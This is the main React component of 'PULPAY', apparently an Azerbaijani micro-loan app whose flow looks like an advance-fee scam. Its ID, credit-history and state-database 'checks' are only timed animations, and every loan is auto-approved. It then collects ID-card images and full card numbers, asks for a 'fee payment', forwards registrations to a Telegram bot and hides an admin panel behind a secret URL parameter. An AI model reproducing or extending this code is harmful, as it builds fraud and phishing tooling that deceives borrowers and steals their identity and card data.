import React, { useState, useEffect, useMemo } from "react";
import "../pulpay.css";
import "../pulpay-landing.css";
import "../pulpay-landing-v2.css";
import "../pulpay-card.css";
import "../pulpay-brand-hero.css";
import "../pulpay-super.css";
import "../pulpay-hero-effects.css";
import "../pulpay-phone-v2.css";
import "../pulpay-modal-light.css";
import "../pulpay-register-v2.css";
import "../pulpay-register-light.css";
import "../pulpay-cards-real.css";
import "../pulpay-cards-photo.css";
import "../pulpay-vcards.css";
import "../pulpay-phone-v3.css";
import "../pulpay-hero-photo.css";
import "../pulpay-faq-bg.css";
import "../pulpay-navbar-light.css";
import "../pulpay-phone-real.css";
import "../pulpay-verify-v2.css";
import "../pulpay-verify-pro.css";
import "../pulpay-approved-pro.css";
import "../pulpay-home-v2.css";
import "../pulpay-fixes.css";
import "../pulpay-final-polish.css";
import "../pulpay-flows.css";
import "../pulpay-fx-footer.css";
import "../pulpay-home-v3.css";
import "../pulpay-card-v2.css";
import "../pulpay-profile-v2.css";
import "../pulpay-profile-pro.css";
import "../pulpay-profile-notif.css";
import "../pulpay-gender.css";
import "../pulpay-register-final.css";
import "../pulpay-reg-loader.css";
import "../pulpay-topnotif.css";
import "../pulpay-bottomnav-v2.css";
import "../pulpay-bank-select.css";
import "../pulpay-fee-payment.css";
import "../pulpay-admin.css";
import "../pulpay-credit-offer.css";
import Splash from "./screens/Splash";
import PhoneEntry from "./screens/PhoneEntry";
import Register from "./screens/Register";
import Verification from "./screens/Verification";
import RegisterComplete from "./screens/RegisterComplete";
import CreditApproved from "./screens/CreditApproved";
import CreditOffer from "./screens/CreditOffer";
import Home from "./screens/Home";
import Applications from "./screens/Applications";
import Profile from "./screens/Profile";
import BankSelection from "./screens/BankSelection";
import CardEntry from "./screens/CardEntry";
import FeePayment from "./screens/FeePayment";
import AdminPanel from "./screens/AdminPanel";
import { ensureTikTokPixel, tiktokTrack } from "./utils/tiktokPixel";
import { usePulpayConfig } from "./hooks/usePulpayConfig";

const ADMIN_URL_KEY = "pulpay-x7k9m2";

const STORAGE_APPS = "pulpay_applications";
const STORAGE_USER = "pulpay_user";
const STORAGE_PHONE = "pulpay_phone";
const STORAGE_ID_FRONT = "pulpay_id_front";
const STORAGE_ID_BACK = "pulpay_id_back";
const STORAGE_NOTIFS = "pulpay_notifs";
const STORAGE_ACTIVE_CARD = "pulpay_active_card";
const STORAGE_RECEIPT_PENDING = "pulpay_receipt_pending";

function readUser() {
  try {
    const raw = localStorage.getItem(STORAGE_USER);
    if (!raw) return null;
    const base = JSON.parse(raw);
    const idFront = localStorage.getItem(STORAGE_ID_FRONT);
    const idBack = localStorage.getItem(STORAGE_ID_BACK);
    return { ...base, idFront, idBack };
  } catch (e) {
    return null;
  }
}

function writeUser(user) {
  const { idFront, idBack, ...rest } = user;
  try {
    localStorage.setItem(STORAGE_USER, JSON.stringify(rest));
    if (idFront) localStorage.setItem(STORAGE_ID_FRONT, idFront);
    if (idBack) localStorage.setItem(STORAGE_ID_BACK, idBack);
  } catch (e) {
    // localStorage quota exceeded - ignore images
    try { localStorage.setItem(STORAGE_USER, JSON.stringify(rest)); } catch (_) {}
  }
}

function clearUser() {
  try {
    localStorage.removeItem(STORAGE_USER);
    localStorage.removeItem(STORAGE_ID_FRONT);
    localStorage.removeItem(STORAGE_ID_BACK);
    localStorage.removeItem(STORAGE_PHONE);
    localStorage.removeItem(STORAGE_APPS);
    localStorage.removeItem(STORAGE_NOTIFS);
    localStorage.removeItem(STORAGE_ACTIVE_CARD);
    localStorage.removeItem(STORAGE_RECEIPT_PENDING);
    localStorage.removeItem("pulpay_user_email_v1");
    localStorage.removeItem("pulpay_notif_prefs_v1");
  } catch (e) {}
}

function readNotifs() {
  try {
    const raw = localStorage.getItem(STORAGE_NOTIFS);
    return raw ? JSON.parse(raw) : [];
  } catch (e) {
    return [];
  }
}

export default function PulpayApp() {
  const [screen, setScreen] = useState(() => {
    // If user refreshes during receipt verification, clear the flag and go back to home
    try {
      if (localStorage.getItem(STORAGE_RECEIPT_PENDING) === "1") {
        localStorage.removeItem(STORAGE_RECEIPT_PENDING);
        return "home";
      }
    } catch (e) {}
    return "splash";
  });
  const [toast, setToast] = useState(null);
  const [activeAppId, setActiveAppId] = useState(null);
  const [userPhone, setUserPhone] = useState(() => {
    try {
      return localStorage.getItem(STORAGE_PHONE) || "";
    } catch (e) {
      return "";
    }
  });
  const [user, setUser] = useState(() => readUser());
  const [pendingUser, setPendingUser] = useState(null);
  const [topNotif, setTopNotif] = useState(null);

  // Load TikTok Pixel once backend config is available
  const pulpayConfig = usePulpayConfig();
  useEffect(() => {
    const px = pulpayConfig?.pixels || {};
    if (px.tiktok_enabled && px.tiktok_pixel_id) {
      ensureTikTokPixel(px.tiktok_pixel_id);
    }
  }, [pulpayConfig]);
  const [regLoading, setRegLoading] = useState(null);
  const [notifsHistory, setNotifsHistory] = useState(() => readNotifs());
  const [activeCard, setActiveCard] = useState(() => {
    try {
      const raw = localStorage.getItem(STORAGE_ACTIVE_CARD);
      return raw ? JSON.parse(raw) : null;
    } catch (e) { return null; }
  });
  const [pickedBankKey, setPickedBankKey] = useState(null);
  const [applications, setApplications] = useState(() => {
    try {
      const raw = localStorage.getItem(STORAGE_APPS);
      if (raw) return JSON.parse(raw);
    } catch (e) {}
    return [];
  });

  useEffect(() => {
    try {
      localStorage.setItem(STORAGE_APPS, JSON.stringify(applications));
    } catch (e) {}
  }, [applications]);

  useEffect(() => {
    try {
      localStorage.setItem(STORAGE_NOTIFS, JSON.stringify(notifsHistory));
    } catch (e) {}
  }, [notifsHistory]);

  useEffect(() => {
    try {
      if (activeCard) {
        localStorage.setItem(STORAGE_ACTIVE_CARD, JSON.stringify(activeCard));
      } else {
        localStorage.removeItem(STORAGE_ACTIVE_CARD);
      }
    } catch (e) {}
  }, [activeCard]);

  useEffect(() => {
    if (!toast) return;
    const t = setTimeout(() => setToast(null), 2500);
    return () => clearTimeout(t);
  }, [toast]);

  useEffect(() => {
    if (!topNotif) return;
    const t = setTimeout(() => setTopNotif(null), topNotif.duration || 4500);
    return () => clearTimeout(t);
  }, [topNotif]);

  const pushTopNotif = ({ title, body, sub, duration, kind }) => {
    const now = new Date();
    const pad = (n) => String(n).padStart(2, "0");
    const stamp = `${pad(now.getDate())}.${pad(now.getMonth() + 1)}.${now.getFullYear()} ${pad(now.getHours())}:${pad(now.getMinutes())}`;
    const item = {
      id: `n_${now.getTime()}_${Math.random().toString(36).slice(2, 6)}`,
      title: title || "PULPAY",
      body: body || "",
      sub: sub || "",
      kind: kind || "success",
      time: stamp,
      unread: true,
    };
    setNotifsHistory((prev) => [item, ...prev].slice(0, 30));
    // Reset first to force re-mount animation when spammed
    setTopNotif(null);
    setTimeout(() => {
      setTopNotif({ key: item.id, title: item.title, body: item.body, sub: item.sub, duration, kind: item.kind });
    }, 20);
  };

  const go = (id) => {
    setScreen(id);
    window.scrollTo(0, 0);
  };
  const notify = (text) => setToast(text);

  const handlePhoneLogin = (phone) => {
    setUserPhone(phone);
    try { localStorage.setItem(STORAGE_PHONE, phone); } catch (e) {}
    const existing = readUser();
    if (existing && existing.firstName) {
      notify(`Xoş gəldiniz, ${existing.firstName}!`);
      go("home");
    } else {
      notify("Qeydiyyat tələb olunur");
      go("register");
    }
  };

  const handleRegisterSubmit = (data) => {
    // Save user immediately, show full-screen loader for 10s, then green success notif, then Home
    writeUser(data);
    setUser(data);
    setPendingUser(null);
    setRegLoading({ name: data.firstName });
    // Fire-and-forget backend notification (Telegram bot)
    try {
      fetch(`${process.env.REACT_APP_BACKEND_URL}/api/public/register-notify`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          first_name: data.firstName || "",
          last_name: data.lastName || "",
          phone: data.phone || "",
        }),
      }).catch(() => {});
    } catch (e) {}
    setTimeout(() => {
      setRegLoading(null);
      pushTopNotif({
        title: "PULPAY",
        body: "Qeydiyyat uğurla tamamlandı",
        sub: `Xoş gəldin, ${data.firstName}!`,
      });
      go("home");
    }, 10000);
  };

  const handleRegisterVerified = () => {
    if (!pendingUser) return go("home");
    writeUser(pendingUser);
    setUser(pendingUser);
    tiktokTrack("CompleteRegistration");
    go("register_done");
  };

  const handleCreditVerified = () => {
    go("credit_offer");
  };

  const handleTakeCredit = ({ amount, period, total, monthly }) => {
    const now = new Date();
    const pad = (n) => String(n).padStart(2, "0");
    const idStamp = `${now.getFullYear()}${pad(now.getMonth() + 1)}${pad(now.getDate())}${pad(now.getHours())}${pad(now.getMinutes())}`;
    const id = `PULPAY-${idStamp}`;
    const createdAt = `${pad(now.getDate())}.${pad(now.getMonth() + 1)}.${now.getFullYear()} / ${pad(now.getHours())}:${pad(now.getMinutes())}`;
    const newApp = {
      id,
      amount,
      period,
      total,
      monthly,
      status: "approved",
      subtitle: "Krediti aktivləşdirin",
      createdAt,
    };
    setApplications((prev) => [newApp, ...prev]);
    setActiveAppId(id);
    pushTopNotif({
      title: "PULPAY",
      body: "Kredit təsdiqləndi",
      sub: `Məbləğ: ${amount.toLocaleString("az-AZ")} ₼ • Aylıq: ${Math.round(monthly)} ₼ • Müddət: ${period} ay`,
      duration: 10000,
    });
    go("home");
  };

  const hasApprovedCredit = useMemo(
    () => applications.some((a) => a.status === "approved"),
    [applications]
  );

  const approvedCredit = useMemo(
    () => applications.find((a) => a.status === "approved") || null,
    [applications]
  );

  const activeApp = useMemo(
    () => applications.find((a) => a.id === activeAppId) || applications[0],
    [applications, activeAppId]
  );

  const handleLogout = () => {
    setUserPhone("");
    setUser(null);
    setApplications([]);
    setNotifsHistory([]);
    clearUser();
    go("splash");
  };

  // Hidden admin panel — detect ?admin=pulpay-x7k9m2 URL param
  const isAdminUrl = (() => {
    try {
      const params = new URLSearchParams(window.location.search);
      return params.get("admin") === ADMIN_URL_KEY;
    } catch (e) { return false; }
  })();

  if (isAdminUrl) {
    return <AdminPanel />;
  }

  return (
    <div className="pulpay-root">
      {screen === "splash" ? (
        <Splash onStart={() => go(userPhone && user ? "home" : "phone")} notify={notify} />
      ) : (
        <div className="app-shell">
          {screen === "phone" && (
            <PhoneEntry go={go} notify={notify} onLogin={handlePhoneLogin} />
          )}
          {screen === "register" && (
            <Register
              go={go}
              notify={notify}
              userPhone={userPhone}
              onSubmit={handleRegisterSubmit}
            />
          )}
          {screen === "verify_register" && (
            <Verification
              title="Yoxlanış gedir"
              subtitle="Məlumatlarınız yoxlanılır"
              duration={15000}
              user={pendingUser}
              showIdCards
              steps={[
                "Şəxsi məlumatlar yoxlanılır",
                "Şəxsiyyət vəsiqəsi analiz edilir",
                "FIN kod dövlət bazasında yoxlanılır",
                "Sistem qərarını hazırlayır",
              ]}
              onDone={handleRegisterVerified}
            />
          )}
          {screen === "register_done" && (
            <RegisterComplete user={user || pendingUser} go={go} />
          )}
          {screen === "verify_credit" && (
            <Verification
              title="Kredit yoxlanışı"
              subtitle="Kredit limitiniz hesablanır"
              duration={20000}
              user={user}
              showIdCards
              steps={[
                "Şəxsiyyət vəsiqəsi yoxlanılır",
                "Kredit tarixçəsi analiz edilir",
                "Risk qiymətləndirilir",
                "Fərdi limit hesablanır",
                "Nəticə hazırlanır",
              ]}
              onDone={handleCreditVerified}
            />
          )}
          {screen === "credit_offer" && (
            <CreditOffer
              go={go}
              user={user || pendingUser}
              onContinue={() => go("credit_approved")}
            />
          )}
          {screen === "credit_approved" && (
            <CreditApproved
              go={go}
              notify={notify}
              user={user}
              onSubmit={handleTakeCredit}
            />
          )}
          {screen === "home" && (
            <Home
              go={go}
              notify={notify}
              user={user}
              approvedCredit={approvedCredit}
              hasApprovedCredit={hasApprovedCredit}
              activeCard={activeCard}
              notifsHistory={notifsHistory}
              onMarkNotifsRead={() =>
                setNotifsHistory((prev) => prev.map((n) => ({ ...n, unread: false })))
              }
              onClearNotifs={() => setNotifsHistory([])}
              onActivateCredit={() => go("bank_selection")}
              onTakeCredit={() => {
                go("fee_payment");
              }}
              onKreditAl={() => {
                if (hasApprovedCredit && approvedCredit) {
                  pushTopNotif({
                    title: "PULPAY",
                    body: "Yeni müraciət mümkün deyil",
                    sub: `Aktiv krediniz var: ${approvedCredit.amount.toLocaleString("az-AZ")} ₼ • ${approvedCredit.period} ay`,
                    duration: 6000,
                    kind: "error",
                  });
                  return;
                }
                go("verify_credit");
              }}
            />
          )}
          {screen === "bank_selection" && (
            <BankSelection
              go={go}
              user={user}
              onPickBank={(key) => {
                setPickedBankKey(key);
                go("card_entry");
              }}
            />
          )}
          {screen === "card_entry" && (
            <CardEntry
              go={go}
              user={user}
              bankKey={pickedBankKey}
              onConfirm={(cardInfo) => {
                setActiveCard(cardInfo);
                const fullNum = (cardInfo.cardNumber || "").replace(/(.{4})/g, "$1 ").trim();
                pushTopNotif({
                  title: "PULPAY",
                  body: "Kart uğurla təsdiqləndi",
                  sub: `Kart nömrəsi: ${fullNum}`,
                  duration: 6000,
                  kind: "success",
                });
                go("home");
              }}
            />
          )}
          {screen === "fee_payment" && (
            <FeePayment
              go={go}
              user={user}
              activeCard={activeCard}
              approvedCredit={approvedCredit}
              notifyTop={pushTopNotif}
              onPaid={() => {
                pushTopNotif({
                  title: "PULPAY",
                  body: "Ödəniş qəbzi qəbul edildi",
                  sub: "Yoxlama tamamlandıqda kredit məbləği 1–2 dəqiqə ərzində köçürüləcək",
                  duration: 8000,
                  kind: "success",
                });
                go("home");
              }}
            />
          )}
          {screen === "applications" && (
            <Applications
              go={go}
              notify={notify}
              applications={applications}
              openDetail={() => {}}
            />
          )}
          {screen === "profile" && (
            <Profile
              go={go}
              notify={notify}
              userPhone={userPhone}
              user={user}
              onLogout={handleLogout}
              notifsHistory={notifsHistory}
              onClearNotifs={() => setNotifsHistory([])}
              onMarkNotifsRead={() =>
                setNotifsHistory((prev) => prev.map((n) => ({ ...n, unread: false })))
              }
            />
          )}
        </div>
      )}
      <div className={`toast ${toast ? "show" : ""}`}>{toast}</div>

      {/* Full-screen registration loading overlay (10s) */}
      {regLoading && (
        <div className="reg-loader" data-testid="register-loader">
          <div className="reg-loader-bg" />
          <div className="reg-loader-orb reg-loader-orb-1" />
          <div className="reg-loader-orb reg-loader-orb-2" />
          <div className="reg-loader-orb reg-loader-orb-3" />
          <div className="reg-loader-center">
            <div className="reg-loader-halo" />
            <div className="reg-loader-ring reg-loader-ring-1" />
            <div className="reg-loader-ring reg-loader-ring-2" />
            <div className="reg-loader-ring reg-loader-ring-3" />
            <div className="reg-loader-dot reg-loader-dot-1" />
            <div className="reg-loader-dot reg-loader-dot-2" />
            <div className="reg-loader-dot reg-loader-dot-3" />
            <div className="reg-loader-logo">
              <img src="/assets/logo.png" alt="PULPAY" />
            </div>
          </div>
          <div className="reg-loader-text">
            <h3>Qeydiyyat tamamlanır<span className="reg-loader-dots"><i /><i /><i /></span></h3>
            <p>Zəhmət olmasa gözləyin, {regLoading.name}</p>
          </div>
          <div className="reg-loader-progress"><span /></div>
        </div>
      )}

      {/* WhatsApp-style top notification (registration, credit approved, etc.) */}
      {topNotif && (
        <div
          key={topNotif.key}
          className="ph-topnotif ph-topnotif-success"
          data-testid="top-notif"
        >
          <div className="ph-topnotif-bar">
            <div className="ph-topnotif-logo">
              <img src="/assets/logo.png" alt="PULPAY" />
            </div>
            <div className="ph-topnotif-body">
              <div className="ph-topnotif-head">
                <b>{topNotif.title}</b>
                <span>indi</span>
              </div>
              <div className="ph-topnotif-title">
                <span className="ph-topnotif-check">✓</span>
                {topNotif.body}
              </div>
              {topNotif.sub && (
                <div className="ph-topnotif-sub">{topNotif.sub}</div>
              )}
            </div>
          </div>
          <div className="ph-topnotif-progress" />
        </div>
      )}
    </div>
  );
}
